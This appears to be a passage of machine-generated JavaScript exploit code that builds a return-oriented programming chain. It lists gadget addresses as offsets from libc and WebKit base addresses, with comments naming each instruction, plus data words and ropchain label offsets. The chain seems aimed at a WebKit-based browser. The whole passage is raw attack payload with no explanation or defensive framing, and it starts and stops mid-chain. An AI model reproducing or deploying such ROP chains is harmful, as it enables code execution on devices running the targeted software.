set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+90416, //L620 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+90384, //L618 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+90400, //L619 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L618: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L619: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L620: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+90488, //L622 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L622: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+90544, //L623 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L623: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+90640, //L626 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L625: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L626: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L627: db([8, 0]); // 0x8 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+90736, //L628 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+90752, //L629 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L628: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L629: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+90840, //L631 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L631: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+90896, //L632 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L632: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+91000, //L634 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L634: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L636: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+91120, //L639 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+91104, //L637 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L637: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L639: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+91264, //L642 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+91232, //L640 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+91248, //L641 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L640: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L641: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L642: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+91336, //L644 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L644: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+91392, //L645 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L645: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+91488, //L648 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L647: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L648: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L649: db([7, 0]); // 0x7 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+91584, //L650 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+91600, //L651 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L650: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L651: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+91688, //L653 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L653: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+91744, //L654 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L654: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+91816, //L657 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L657: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+91872, //L658 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L658: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+91960, //L660 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L660: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L662: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+92080, //L665 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+92064, //L663 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L663: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L665: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+92224, //L668 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+92192, //L666 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+92208, //L667 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L666: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L667: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L668: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+92304, //L669 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L669: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L671: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+92424, //L674 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+92408, //L672 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L672: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L674: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+92568, //L677 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+92536, //L675 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+92552, //L676 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L675: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L676: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L677: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+92640, //L679 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L679: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+92696, //L680 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L680: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+92792, //L683 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L682: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L683: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L684: db([8, 0]); // 0x8 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+92888, //L685 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+92904, //L686 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L685: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L686: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+92992, //L688 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L688: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+93048, //L689 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L689: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+93120, //L692 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L692: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+93176, //L693 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L693: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L695: libc_base+755774, //mov rax, rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+93312, //L696 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L696: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L698: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+93432, //L701 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+93416, //L699 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L699: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L701: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+93576, //L704 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+93544, //L702 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+93560, //L703 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L702: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L703: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L704: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+93648, //L706 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L706: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+93704, //L707 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L707: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+93800, //L710 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L709: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L710: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L711: db([9, 0]); // 0x9 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+93896, //L712 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+93912, //L713 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L712: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L713: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+94000, //L715 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L715: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+94056, //L716 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L716: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+94128, //L719 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L719: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+94184, //L720 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L720: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L722: libc_base+764760, //pop rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+94320, //L723 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L723: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L725: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+94440, //L728 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+94424, //L726 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L726: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L728: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+94584, //L731 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+94552, //L729 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+94568, //L730 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L729: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L730: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L731: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+94656, //L733 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L733: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+94712, //L734 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L734: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+94808, //L737 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L736: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L737: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L738: db([10, 0]); // 0xa set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+94904, //L739 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+94920, //L740 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L739: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L740: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+95008, //L742 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L742: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+95064, //L743 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L743: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+95136, //L746 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L746: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+95192, //L747 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L747: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+95280, //L749 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L749: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L751: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+95400, //L754 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+95384, //L752 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L752: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L754: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+95544, //L757 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+95512, //L755 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+95528, //L756 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L755: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L756: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L757: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+95616, //L759 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L759: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+95672, //L760 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L760: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+95768, //L763 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L762: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L763: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L764: db([5, 0]); // 0x5 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+95864, //L765 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+95880, //L766 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L765: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L766: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+95968, //L768 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L768: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+96024, //L769 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L769: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+96128, //L771 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L771: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L773: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+96248, //L776 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+96232, //L774 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L774: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L776: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+96392, //L779 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+96360, //L777 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+96376, //L778 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L777: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L778: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L779: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+96464, //L781 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L781: db([0, 0]); // 0x0 